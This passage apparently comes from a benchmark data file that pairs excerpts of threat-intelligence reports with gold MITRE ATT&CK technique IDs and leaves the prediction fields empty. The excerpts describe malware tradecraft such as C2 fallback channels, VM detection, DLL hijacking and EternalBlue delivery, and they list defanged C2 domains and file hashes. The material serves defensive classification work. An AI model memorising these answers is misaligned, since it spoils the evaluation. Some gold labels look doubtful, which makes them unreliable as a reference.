+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Encrypted backdoor configuration Description Decryption Strings Check code MDDEFGEGETGIZ Addr1: tel.qpoe[.]com Addr2: elderscrolls.wikaba[.]com Addr3: tel.qpoe[.]com Port1: 443 Port2: 443 Port3: 53 LoginPasswd: someone HostMark: mark Proxy: 0 Figure 12",
+ "gold": [
+ "T1140",
+ "T1027",
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Exploit Analysis Despite being an older vulnerability, many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word",
+ "gold": [
+ "T1068",
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Exploits CVE-2017-0143, SMB exploit CVE-2017-0146, SMB exploit These 2 exploits are EternalBlue/Doublepulsar and are used to drop the Stage1 Dropper onto a system.\u00a0 Installation The Gh0stRAT dropper arrives on a PC through the use of EternalBlue/DoublePulsar.\u00a0 Once on a victim\u2019s PC, the dropper executable is launched and it decrypts and loads the Gh0stRAT DLL into memory.\u00a0 It then passes the config buffer to the extracted DLL and calls the exported function (Shellex) [Screenshot 2] The mainthread of the code.\u00a0 Note the call at the bottom that calls Shellex Gh0stRAT dll functionality An important note:\u00a0 In its base state, this sample is damaged, therefore it will not install its services properly.\u00a0 However, as the service information is included, I will list it anyways.\u00a0 Additionally, samples downloaded from its distribution server DO install correctly,\u00a0 and are downloaded during the base dll\u2019s runtime",
+ "gold": [
+ "T1574.002",
+ "T1574.001",
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server Section 2 The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server",
+ "gold": [
+ "T1090",
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 2: APT39 attack lifecycle There are some indications that APT39 demonstrated a penchant for operational security to bypass detection efforts by network defenders, including the use of a modified version of Mimikatz that was repacked to thwart anti-virus detection in one case, as well as another instance when after gaining initial access APT39 performed credential harvesting outside of a compromised entity's environment to avoid detection",
+ "gold": [
+ "T1027.002",
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The \u2018Company\u2019 field in this case, contains the raw command that the attacker wishes to run, downloading and executing the next stage of the malware. Delivery via HTA Loader. In this case the attackers sent an HTML Application file (.hta) to targets most likely as an email attachment",
+ "gold": [
+ "T1074",
+ "T1547.001",
+ "T1053.005",
+ "T1010",
+ "T1106"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 4: Execution Workflow Section of v.vbs After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts",
+ "gold": [
+ "T1064",
+ "T1053.005",
+ "T1106"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 8 CARROTBAT downloading final payload via certutil \u00a0 The downloaded CAB file has the following properties: MD5 a943e196b83c4acd9c5ce13e4c43b4f4 SHA1 e66e416f300c7efb90c383a7630c9cfe901ff9fd SHA256 cfe436c1f0ce5eb7ac61b32cd073cc4e4b21d5016ceef77575bef2c2783c2d62 File Type Microsoft Cabinet archive data, 181248 bytes, 3 files \u00a0 The following three files and their descriptions are dropped by this CAB file: \u00a0 Filename Purpose Install.bat Installation batch script responsible for copying the other files to C:\\Users\\Public\\Downloads and setting the Run registry key to ensure persistence",
+ "gold": [
+ "T1064",
+ "T1036",
+ "T1105",
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figures 8 and 9: LiteHTTP screenshots taken from the user`s profile in which the acronym \u201cKnock\u201d appears Conclusion SpeakUp`s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making",
+ "gold": [
+ "T1113",
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "First, we had not seen the CPU fan check used before, and upon testing the WMI query in a VMware Windows 7 virtual machine we saw no result, as seen in Figure 1 Figure 1 WMI query for the Win32_Fan class on a VM returning no statistics However, when we ran the same query in a physical system running Windows 7, we saw the contents of the Win32_Fan class, as seen in Figure 2",
+ "gold": [
+ "T1497",
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "For example, we can see it will inject itself to one these three processes: %ProgramFiles(x86)%\\Sophos\\AutoUpdate\\ALUpdate.exe %ProgramFiles(x86)%\\Common Files\\Java\\Java Update\\jusched.exe %ProgramFiles(x86)%\\Common Files\\Adobe\\ARM\\1.0\\armsvc.exe The attempt to inject itself into a process belonging to antivirus product suite is particularly bold",
+ "gold": [
+ "T1055",
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "For instance, the following 15 bytes were used to generate an HTTP parameter during our analysis: Random Value Constant Value agent_id 0F EE C8 83 56 0E 9F F0 EB 98 43 30 30 30 30 The resulting ciphertext is then encoded using XAgent\u2019s base64 encoding routine that starts by building the following encoding alphabet: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_ As you can see, this is not the standard base64 alphabet, rather it is the \u201cURL and Filename safe\u201d Base 64 Alphabet from RFC 4648, as the \u201c+\u201d in the standard alphabet is replaced with \u201c-\u201d and the \u201c/\u201d replaced with \u201c_\u201d",
+ "gold": [
+ "T1132",
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "GET //<5 digit number>/<4 character string>.php?_id=<43 character string>= HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) Host: Cache-Control: no-cache Figure 6: Sample GET request for WATERSPOUT backdoor Although there are no current infrastructure ties to link this backdoor to APT12, there are several data points that show a possible tie to the same actors: Same initial delivery method (spear phishing email) with a Microsoft Word Document exploiting CVE-2012-0158",
+ "gold": [
+ "T1010",
+ "T1008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "HawkEye offers the following exfiltration options based on the configuration: email, FTP, SFTP, HTTP POST to PanelURL API or ProxyURL.As mentioned above, in the comments of the main loop section, it also comes with several anti-analysis features, including starting an anti-debugging thread or disabling certain AV-related programs via the Image File Execution Options (IFEO) evasion technique by registering invalid debuggers that redirect and effectively disable various system and security applications.The following diagram summarizes the full infection process:ConclusionRecent changes in both the ownership and development efforts of the HawkEye Reborn keylogger/stealer demonstrate that this is a threat that will continue to experience ongoing development and improvement moving forward",
+ "gold": [
+ "T1562.001",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Hijack Clipboard Bitcoin Address Zyklon has the ability to hijack the clipboard, and replaces the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server",
+ "gold": [
+ "T1016",
+ "T1115"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "If running with administrator privileges on a 32-bit host: Copy the temporary DLL in %TEMP% to %WINDOWS%\\LINKINFO.dll Otherwise: Copy the temporary DLL in %TEMP% to %APPDATA%\\cnagnt.dll Delete the temporary DLL in %TEMP% Write a \u2018Conime.lnk\u2019 file in the user\u2019s startup path",
+ "gold": [
+ "T1055",
+ "T1574.002",
+ "T1070.004",
+ "T1574.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "In each iteration of the communications loop, the Trojan will check to see if the modification time of the first file changed, and if it is not updated the Trojan will update the second file by writing the string bc<5 random lowercase characters>. to the file by creating an HTTP POST request to a URL structured as follows: + + \u201c?supportsTeamDrive=true&uploadType=resumable&fields=kind,id,name,mimeType,parents\u201d In one RogueRobin sample (SHA256: f1b2bc0831\u2026), the author did not use the Google Drive URL provided by the actor when issuing the x_mode command, and instead included a \u00a0hardcoded Google Drive URL, as seen in Figure 6",
+ "gold": [
+ "T1102",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "In most lures, one scheduled task persisted an APT32-specific backdoor and the other scheduled task initialized a commercially-available backdoor as backup",
+ "gold": [
+ "T1053.005",
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts",
+ "gold": [
+ "T1046",
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It has the following command line argument help: info\u00a0 [options] [options]: \u00a0 -d Domain \u00a0 -o OsInfo \u00a0 -t TsInfo \u00a0 -n NetuseInfo \u00a0 -s ShareInfo ShareDir \u00a0 -c Connect Test \u00a0 -a Local And Global Group User Info \u00a0 -l Local Group User Info \u00a0 -g Global Group User Info \u00a0 -ga Group Administrators \u00a0 -gp Group Power Users \u00a0 -gd Group Domain Admins \u00a0 -f //input server list from infile, OneServerOneLine info <\\\\server> ChromePass: A tool from NirSoft used for recovering passwords stored in the Chrome browser",
+ "gold": [
+ "T1069",
+ "T1087"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It then uses the base64 encoding function with this alphabet to encode the data, which in the above case resulted in: D-7Ig1ngV3PkdouzP974 The Trojan then creates a string of 9 random symbols and appends the encoded ciphertext to this random string",
+ "gold": [
+ "T1132",
+ "T1027",
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor",
+ "gold": [
+ "T1090",
+ "T1016",
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Once Shellex is called, it first passes each of the items in the config buffer to their own strings.\u00a0 Next, it creates a mutex using the filename and checks to see if the Service key for the service name exists.\u00a0 If so, it opens it using service manager.\u00a0 If not, it first saves a copy of itself to %Program Files (x86)%/DIFXE/svchost.exe.\u00a0 Next, it creates the service and runs it.\u00a0 Once the service is running, it creates a new mutex using [C2URL]:[PORT] and connects to the C2 server.\u00a0 It then sends the Implant_Heartbeat opcode, and then calls its payload function to grab Version Information (x86 and x64) Host information SystemInfo Processor Count and Write Speed Global Memory Status before formatting it, altering the InstallTime subkey, and sending all of the information back to its C2 in the Implant_Login buffer",
+ "gold": [
+ "T1082",
+ "T1569.002",
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails",
+ "gold": [
+ "T1008",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "One sample in particular, cba5ab65a\u2026 used yet another unique user agent string in combination with the previous user agent for its C2: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 A malware sample using two separate unique user agent strings is uncommon",
+ "gold": [
+ "T1033",
+ "T1543.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Otherwise, the Server will respond with a command followed by a set of parameters, split up by the delimiter <>:[command]<>[parameters for command in hexadecimal format] The available commands are: Command Description 1 Run command 2 Upload a file 3 Download a specified file \u00a0 The parameters for each command are issued in hexadecimal format",
+ "gold": [
+ "T1016",
+ "T1070.006",
+ "T1059",
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Palo Alto Networks customers are protected from this OilRig attack campaign and OopsIE by: AutoFocus customers can track this Trojan with the OopsIE tag All known OopsIE samples are marked with malicious verdicts in WildFire All known OopsIE C2 domains have DNS signatures and are classified as Command and Control \u00a0 Indicators of Compromise OopsIE Trojan 36e66597a3ff808acf9b3ed9bc93a33a027678b1e262707682a2fd1de7731e23 055b7607848777634b2b17a5c51da7949829ff88084c3cb30bcb3e58aae5d8e9 6b240178eedba4ebc9f1c8b56bac02676ce896e609577f4fb64fa977d67c0761 9e8ec04e534db1e714159cc68891be454c2459f179ab1df27d7f89d2b6793b17 OopsIE C2 defender-update[.]com windowspatch[.]com The post OilRig Targets a Middle Eastern Government and Adds Evasion Techniques to OopsIE appeared first on Palo Alto Networks Blog",
+ "gold": [
+ "T1008",
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Query attempts to detect VirtualBox environment from the win32_BIOS WMI class. Query attempts to detect Bochs environment from the win32_BIOS WMI class. Query attempts to detect QEMU environment from the win32_BIOS WMI class. Query attempts to detect VirtualBox environment from the win32_BIOS WMI class. Query attempts to detect VMWare environment from the win32_BIOS WMI class. Query attempts to detect Xen environment from the win32_BIOS WMI class. Uses this query to check the system information for the string \u201cVMware\u201d",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Russia Ukraine Poland Lithuania Belarus Azerbaijan Kyrgyzstan Kazakhstan Iran Israel Turkey Libya Kuwait Taiwan Vietnam India Croatia Germany Belgium Sweden Victim profiles point to an expansive interest in ICS: power generation site owners power facilities construction power generation operators large suppliers and manufacturers of heavy power related materials investors However, we also noticed that\u00a0the target list includes government, property holding, and technology organizations as well: high level government other ICS construction federal land holding agencies municipal offices federal emergency services space and earth measurement and assessment labs national standards body banks high-tech\u00a0transportation academic research Victim cases We gained insight into significant BE2 victim profiles over the summer of 2014",
+ "gold": [
+ "T1007",
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Several Mandiant investigations revealed that, after gaining access, APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon\u2019s Invoke-Obfuscation framework",
+ "gold": [
+ "T1070",
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Socks5 Proxy Zyklon features the ability to establish a reverse Socks5 proxy server on infected host machines",
+ "gold": [
+ "T1090",
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Stage 1 sample file: 3amadi_hamas.zip MD5: e686ffa90b2bfb567547f1c0dad1ae0b Type: Compressed container Child file/lure name: \u0645\u062d\u0636\u0631 \u0627\u062c\u062a\u0645\u0627\u0639 \u0627\u0644\u0639\u0645\u0627\u062f\u064a \u0645\u0639 \u0647\u0646\u064a\u0629 \u0631\u064a\u0654\u064a\u0633 \u062d\u0645\u0627\u0633 \u0627\u0645\u0633 \u0627\u0644\u0627\u062d\u062f .exe Child file/lure MD5: 92dd0f16e8ae274d83ba1d0d5b2e342 This sample ZIP file, which is similar to many other stage 1 downloaders in this campaign, contains an executable that is a compiled AutoIt script and which embeds some interesting functions (listed in the table below)",
+ "gold": [
+ "T1036",
+ "T1074",
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Takes screenshots when recording VoiceIP app audio",
+ "gold": [
+ "T1113",
+ "T1123"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
